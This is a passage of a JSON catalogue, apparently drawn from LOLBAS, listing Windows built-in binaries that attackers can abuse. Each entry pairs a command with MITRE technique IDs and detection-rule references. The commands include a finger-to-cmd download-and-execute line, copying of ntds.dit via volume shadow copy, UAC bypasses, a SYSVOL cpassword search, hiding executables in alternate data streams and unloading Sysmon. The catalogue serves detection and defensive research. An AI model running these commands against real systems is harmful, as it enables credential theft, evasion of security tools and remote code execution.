Name":"Esentutl.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"esentutl.exe /y {PATH_SMB:.exe} /d {PATH_ABSOLUTE}:file.exe /o","description":"Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.","usecase":"Copy file and hide it in an alternate data stream as a defensive counter measure","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\esentutl.exe","C:\\Windows\\SysWOW64\\esentutl.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_params.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml"}],"references":["https://twitter.com/egre55/status/985994639202283520","https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/","https://twitter.com/bohops/status/1094810861095534592","https://lolbas-project.github.io/lolbas/Binaries/Esentutl/"]},{"id":"lolbas:esentutl-exe:4","toolId":"lolbas:esentutl-exe","toolName":"Esentutl.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"esentutl.exe /y {PATH_SMB:.source.exe} /d {PATH_SMB:.dest.exe} /o","description":"Copies the source EXE to the destination EXE file","usecase":"Use to copy files from one unc path to another","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\esentutl.exe","C:\\Windows\\SysWOW64\\esentutl.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_params.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml"}],"references":["https://twitter.com/egre55/status/985994639202283520","https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/","https://twitter.com/bohops/status/1094810861095534592","https://lolbas-project.github.io/lolbas/Binaries/Esentutl/"]},{"id":"lolbas:esentutl-exe:5","toolId":"lolbas:esentutl-exe","toolName":"Esentutl.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"esentutl.exe /y /vss c:\\windows\\ntds\\ntds.dit /d {PATH_ABSOLUTE:.dit}","description":"Copies a (locked) file using Volume Shadow Copy","usecase":"Copy/extract a locked file such as the AD Database","mitre":["T1003.003"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\esentutl.exe","C:\\Windows\\SysWOW64\\esentutl.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_params.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml"}],"references":["https://twitter.com/egre55/status/985994639202283520","https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/","https://twitter.com/bohops/status/1094810861095534592","https://lolbas-project.github.io/lolbas/Binaries/Esentutl/"]},{"id":"lolbas:eudcedit-exe:0","toolId":"lolbas:eudcedit-exe","toolName":"Eudcedit.exe","name":"UAC Bypass","source":"LOLBAS","platform":["Windows"],"capability":["UAC Bypass","Privilege Escalation"],"nativeCategory":["UAC Bypass"],"command":"eudcedit","description":"Once executed, the Private Charecter Editor will be opened - click OK, then click File -> Font Links. In the next window choose the option \"Link with Selected Fonts\" and click on Save As, then in the opened enter the command you want to execute.","usecase":"Execute a binary or script as a high-integrity process without a UAC prompt.","mitre":["T1548.002"],"privilege":"admin","fullPath":["c:\\windows\\system32\\eudcedit.exe","c:\\windows\\syswow64\\eudcedit.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"Processes spawned by eudcedit.exe."}],"references":["https://medium.com/@matanb707/windows-fonts-exploitation-in-2025-bypassing-uac-with-eudcedit-915599705639","https://lolbas-project.github.io/lolbas/Binaries/Eudcedit/"]},{"id":"lolbas:eventvwr-exe:0","toolId":"lolbas:eventvwr-exe","toolName":"Eventvwr.exe","name":"UAC Bypass","source":"LOLBAS","platform":["Windows"],"capability":["UAC Bypass","Privilege Escalation"],"nativeCategory":["UAC Bypass"],"command":"eventvwr.exe","description":"During startup, eventvwr.exe checks the registry value `HKCU\\Software\\Classes\\mscfile\\shell\\open\\command` for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.","usecase":"Execute a binary or script as a high-integrity process without a UAC prompt.","mitre":["T1548.002"],"privilege":"user","fullPath":["C:\\Windows\\System32\\eventvwr.exe","C:\\Windows\\SysWOW64\\eventvwr.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/d31ea6253ea40789b1fc49ade79b7ec92154d12a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/eventvwr_uac_bypass.yml"},{"type":"IOC","value":"eventvwr.exe launching child process other than mmc.exe"},{"type":"IOC","value":"Creation or modification of the registry value HKCU\\Software\\Classes\\mscfile\\shell\\open\\command"}],"references":["https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/","https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1","https://twitter.com/orange_8361/status/1518970259868626944","https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/"]},{"id":"lolbas:eventvwr-exe:1","toolId":"lolbas:eventvwr-exe","toolName":"Eventvwr.exe","name":"UAC Bypass","source":"LOLBAS","platform":["Windows"],"capability":["UAC Bypass","Privilege Escalation"],"nativeCategory":["UAC Bypass"],"command":"ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c \"{CMD}\" > RecentViews & copy RecentViews %LOCALAPPDATA%\\Microsoft\\EventV~1\\RecentViews & eventvwr.exe","description":"During startup, eventvwr.exe uses .NET deserialization with `%LOCALAPPDATA%\\Microsoft\\EventV~1\\RecentViews` file. This file can be created using https://github.com/pwntester/ysoserial.net","usecase":"Execute a command to bypass security restrictions that limit the use of command-line interpreters.","mitre":["T1548.002"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\eventvwr.exe","C:\\Windows\\SysWOW64\\eventvwr.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/d31ea6253ea40789b1fc49ade79b7ec92154d12a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/eventvwr_uac_bypass.yml"},{"type":"IOC","value":"eventvwr.exe launching child process other than mmc.exe"},{"type":"IOC","value":"Creation or modification of the registry value HKCU\\Software\\Classes\\mscfile\\shell\\open\\command"}],"references":["https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/","https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1","https://twitter.com/orange_8361/status/1518970259868626944","https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/"]},{"id":"lolbas:expand-exe:0","toolId":"lolbas:expand-exe","toolName":"Expand.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"expand {PATH_SMB:.bat} {PATH_ABSOLUTE:.bat}","description":"Copies source file to destination.","usecase":"Use to copies the source file to the destination file","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Expand.exe","C:\\Windows\\SysWOW64\\Expand.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"}],"references":["https://twitter.com/infosecn1nja/status/986628482858807297","https://twitter.com/Oddvarmoe/status/986709068759949319","https://lolbas-project.github.io/lolbas/Binaries/Expand/"]},{"id":"lolbas:expand-exe:1","toolId":"lolbas:expand-exe","toolName":"Expand.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"expand {PATH_ABSOLUTE:.source.ext} {PATH_ABSOLUTE:.dest.ext}","description":"Copies source file to destination.","usecase":"Copies files from A to B","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Expand.exe","C:\\Windows\\SysWOW64\\Expand.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"}],"references":["https://twitter.com/infosecn1nja/status/986628482858807297","https://twitter.com/Oddvarmoe/status/986709068759949319","https://lolbas-project.github.io/lolbas/Binaries/Expand/"]},{"id":"lolbas:expand-exe:2","toolId":"lolbas:expand-exe","toolName":"Expand.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"expand {PATH_SMB:.bat} {PATH_ABSOLUTE}:file.bat","description":"Copies source file to destination Alternate Data Stream (ADS)","usecase":"Copies files from A to B","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Expand.exe","C:\\Windows\\SysWOW64\\Expand.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"}],"references":["https://twitter.com/infosecn1nja/status/986628482858807297","https://twitter.com/Oddvarmoe/status/986709068759949319","https://lolbas-project.github.io/lolbas/Binaries/Expand/"]},{"id":"lolbas:explorer-exe:0","toolId":"lolbas:explorer-exe","toolName":"Explorer.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"explorer.exe /root,\"{PATH_ABSOLUTE:.exe}\"","description":"Execute specified .exe with the parent process spawning from a new instance of explorer.exe","usecase":"Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\explorer.exe","C:\\Windows\\SysWOW64\\explorer.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_explorer_break_process_tree.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_explorer_lolbin_execution.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f2bc0c685d83db7db395fc3dc4b9729759cd4329/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml"},{"type":"IOC","value":"Multiple instances of explorer.exe or explorer.exe using the /root command line is suspicious."}],"references":["https://twitter.com/CyberRaiju/status/1273597319322058752?s=20","https://twitter.com/bohops/status/1276356245541335048","https://twitter.com/bohops/status/986984122563391488","https://lolbas-project.github.io/lolbas/Binaries/Explorer/"]},{"id":"lolbas:explorer-exe:1","toolId":"lolbas:explorer-exe","toolName":"Explorer.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"explorer.exe {PATH_ABSOLUTE:.exe}","description":"Execute notepad.exe with the parent process spawning from a new instance of explorer.exe","usecase":"Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\explorer.exe","C:\\Windows\\SysWOW64\\explorer.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_explorer_break_process_tree.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_explorer_lolbin_execution.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f2bc0c685d83db7db395fc3dc4b9729759cd4329/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml"},{"type":"IOC","value":"Multiple instances of explorer.exe or explorer.exe using the /root command line is suspicious."}],"references":["https://twitter.com/CyberRaiju/status/1273597319322058752?s=20","https://twitter.com/bohops/status/1276356245541335048","https://twitter.com/bohops/status/986984122563391488","https://lolbas-project.github.io/lolbas/Binaries/Explorer/"]},{"id":"lolbas:extexport-exe:0","toolId":"lolbas:extexport-exe","toolName":"Extexport.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Extexport.exe {PATH_ABSOLUTE:folder} foo bar","description":"Load a DLL located in the specified folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll.","usecase":"Execute dll file","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files\\Internet Explorer\\Extexport.exe","C:\\Program Files (x86)\\Internet Explorer\\Extexport.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extexport.yml"},{"type":"IOC","value":"Extexport.exe loads dll and is execute from other folder the original path"}],"references":["http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Extexport/"]},{"id":"lolbas:extrac32-exe:0","toolId":"lolbas:extrac32-exe","toolName":"Extrac32.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"extrac32 {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE}:file.exe","description":"Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.","usecase":"Extract data from cab file and hide it in an alternate data stream.","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\extrac32.exe","C:\\Windows\\SysWOW64\\extrac32.exe"],"toolType":"Binary","detection":[{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32_ads.yml"}],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://twitter.com/egre55/status/985994639202283520","https://lolbas-project.github.io/lolbas/Binaries/Extrac32/"]},{"id":"lolbas:extrac32-exe:1","toolId":"lolbas:extrac32-exe","toolName":"Extrac32.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"extrac32 {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE}:file.exe","description":"Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.","usecase":"Extract data from cab file and hide it in an alternate data stream.","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\extrac32.exe","C:\\Windows\\SysWOW64\\extrac32.exe"],"toolType":"Binary","detection":[{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32_ads.yml"}],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://twitter.com/egre55/status/985994639202283520","https://lolbas-project.github.io/lolbas/Binaries/Extrac32/"]},{"id":"lolbas:extrac32-exe:2","toolId":"lolbas:extrac32-exe","toolName":"Extrac32.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"extrac32 /Y /C {PATH_SMB} {PATH_ABSOLUTE}","description":"Copy the source file to the destination file and overwrite it.","usecase":"Download file from UNC/WEBDav","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\extrac32.exe","C:\\Windows\\SysWOW64\\extrac32.exe"],"toolType":"Binary","detection":[{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32_ads.yml"}],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://twitter.com/egre55/status/985994639202283520","https://lolbas-project.github.io/lolbas/Binaries/Extrac32/"]},{"id":"lolbas:extrac32-exe:3","toolId":"lolbas:extrac32-exe","toolName":"Extrac32.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"extrac32.exe /C {PATH_ABSOLUTE:.source.exe} {PATH_ABSOLUTE:.dest.exe}","description":"Command for copying file from one folder to another","usecase":"Copy file","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\extrac32.exe","C:\\Windows\\SysWOW64\\extrac32.exe"],"toolType":"Binary","detection":[{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32_ads.yml"}],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://twitter.com/egre55/status/985994639202283520","https://lolbas-project.github.io/lolbas/Binaries/Extrac32/"]},{"id":"lolbas:findstr-exe:0","toolId":"lolbas:findstr-exe","toolName":"Findstr.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"findstr /V /L W3AllLov3LolBas {PATH_ABSOLUTE:.exe} > {PATH_ABSOLUTE}:file.exe","description":"Searches for the string W3AllLov3LolBas, since it does not exist (/V) the specified .exe file is written to an Alternate Data Stream (ADS) of the specified target file.","usecase":"Add a file to an alternate data stream to hide from defensive counter measures","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\findstr.exe","C:\\Windows\\SysWOW64\\findstr.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml"}],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://lolbas-project.github.io/lolbas/Binaries/Findstr/"]},{"id":"lolbas:findstr-exe:1","toolId":"lolbas:findstr-exe","toolName":"Findstr.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"findstr /V /L W3AllLov3LolBas {PATH_SMB:.exe} > {PATH_ABSOLUTE}:file.exe","description":"Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.","usecase":"Add a file to an alternate data stream from a webdav server to hide from defensive counter measures","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\findstr.exe","C:\\Windows\\SysWOW64\\findstr.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml"}],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://lolbas-project.github.io/lolbas/Binaries/Findstr/"]},{"id":"lolbas:findstr-exe:2","toolId":"lolbas:findstr-exe","toolName":"Findstr.exe","name":"Credentials","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Credentials"],"command":"findstr /S /I cpassword \\\\sysvol\\policies\\*.xml","description":"Search for stored password in Group Policy files stored on SYSVOL.","usecase":"Find credentials stored in cpassword attrbute","mitre":["T1552.001"],"privilege":"user","fullPath":["C:\\Windows\\System32\\findstr.exe","C:\\Windows\\SysWOW64\\findstr.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml"}],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://lolbas-project.github.io/lolbas/Binaries/Findstr/"]},{"id":"lolbas:findstr-exe:3","toolId":"lolbas:findstr-exe","toolName":"Findstr.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"findstr /V /L W3AllLov3LolBas {PATH_SMB:.exe} > {PATH_ABSOLUTE:.exe}","description":"Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is downloaded to the target file.","usecase":"Download/Copy file from webdav server","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\findstr.exe","C:\\Windows\\SysWOW64\\findstr.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml"}],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://lolbas-project.github.io/lolbas/Binaries/Findstr/"]},{"id":"lolbas:finger-exe:0","toolId":"lolbas:finger-exe","toolName":"Finger.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"finger user@example.host.com | more +2 | cmd","description":"Downloads payload from remote Finger server. This example connects to \"example.host.com\" asking for user \"user\"; the result could contain malicious shellcode which is executed by the cmd process.","usecase":"Download malicious payload","mitre":["T1105"],"privilege":"user","fullPath":["c:\\windows\\system32\\finger.exe","c:\\windows\\syswow64\\finger.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_finger_usage.yml"},{"type":"IOC","value":"finger.exe should not be run on a normal workstation."},{"type":"IOC","value":"finger.exe connecting to external resources."}],"references":["https://twitter.com/DissectMalware/status/997340270273409024","https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11)","https://lolbas-project.github.io/lolbas/Binaries/Finger/"]},{"id":"lolbas:fltmc-exe:0","toolId":"lolbas:fltmc-exe","toolName":"fltMC.exe","name":"Tamper","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Tamper"],"command":"fltMC.exe unload SysmonDrv","description":"Unloads a driver used by security agents","usecase":"Defense 